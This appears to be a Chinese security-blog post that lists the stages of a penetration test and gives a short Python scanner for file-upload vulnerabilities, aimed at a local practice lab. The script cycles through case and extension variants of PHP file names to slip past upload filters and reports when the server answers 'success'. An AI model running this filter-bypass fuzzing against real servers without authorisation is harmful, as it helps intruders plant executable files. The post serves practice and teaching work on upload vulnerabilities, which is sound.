本文最后更新于 420 天前,其中的信息可能已经有所发展或是发生改变。
:::info
💘渗透全流程:
信息收集 – 漏洞发现 – 漏洞👣利用 – 权限提升 – 隧道搭建 – 内网渗透 – 横向移动 – 后渗透
:::
文件上传漏洞扫描器
V1.0
#! /usr/bin/env python
'''
文件上传漏洞扫描器
1. 搜索上传接口
2. 上传文件(bypass)
3. 验证回显(通常是 success 之类的文案或者文件路径)
'''
import requests
file_path = './img/1.jpg'
fuzz_file_ext = ['php', 'php3', 'php5', 'Php', 'pHP', 'phtml']
def check_file_upload(url, file_path, fuzz_file_ext):
try:
with open(file_path, 'rb') as file:
for ext in fuzz_file_ext:
file_name = f'image.{ext}'
files = {'upload_file': (file_name, file)}
data = {'submit': 'true'}
response = requests.post(url, data, files=files)
### TODO: 上传成功的条件需要优化 ###
if 'success' in response.text:
print(f'[+] upload file success. filename: {file_name}')
break
else:
print(f'[-] upload file faild, there is no vul. filename: {file_name}')
except Exception as e:
print(f'[x] upload file exception !!! ')
print(e)
if __name__ == '__main__':
url = 'http://192.168.225.135:89/Pass-01/index.php'
check_file_upload(url, file_path, fuzz_file_ext)